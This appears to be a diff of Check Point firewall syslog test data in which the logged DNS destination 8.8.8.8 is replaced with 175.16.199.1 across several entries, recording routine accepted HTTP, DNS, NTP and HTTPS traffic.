 <134>1 2020-03-29T22:21:40Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811f74,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"39468"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10670"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T22:21:40Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811f74,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46909"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T22:21:40Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811f74,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"47170"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10671"; xlatesrc:"0.0.0.0"]
-<134>1 2020-03-29T22:22:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fb3,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51565"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T22:22:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fb3,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585520563"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48353"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T22:22:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fb3,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51565"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T22:22:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fb3,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585520563"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48353"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T22:22:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811fb4,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T22:22:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fbd,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585520573"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53031"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T22:22:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fbd,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585520573"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53031"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T22:22:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811fbd,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36348"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T22:22:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811fbd,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48565"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T22:22:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811fbd,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52888"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10672"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T22:22:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811fbd,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52890"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10673"; xlatesrc:"0.0.0.0"]
-<134>1 2020-03-29T22:22:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fbd,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585520573"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"32924"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T22:23:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fc7,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585520583"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39000"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T22:23:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fc7,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585520583"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57449"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T22:22:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fbd,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585520573"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"32924"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T22:23:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fc7,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585520583"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39000"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T22:23:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fc7,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585520583"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57449"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T22:23:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fc9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"129.250.35.250"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"32907"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T22:23:06Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"425984"; ifdir:"outbound"; ifname:"eth0"; logid:"1"; loguid:"{0x5e811fcb,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51754"; service:"80"; src:"192.168.1.100"; tcp_flags:"FIN-ACK"; tcp_packet_out_of_state:"First packet isn't SYN"]
 <134>1 2020-03-29T22:23:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811fcb,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52114"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T22:23:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811fcb,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52115"; service:"443"; service_id:"https"; src:"192.168.1.117"]
-<134>1 2020-03-29T22:23:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fd1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585520593"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51981"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T22:23:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fd1,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585520593"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56889"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T22:23:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fdb,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585520603"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57369"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T22:23:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fd1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585520593"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51981"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T22:23:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fd1,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585520593"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56889"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T22:23:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fdb,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585520603"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57369"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
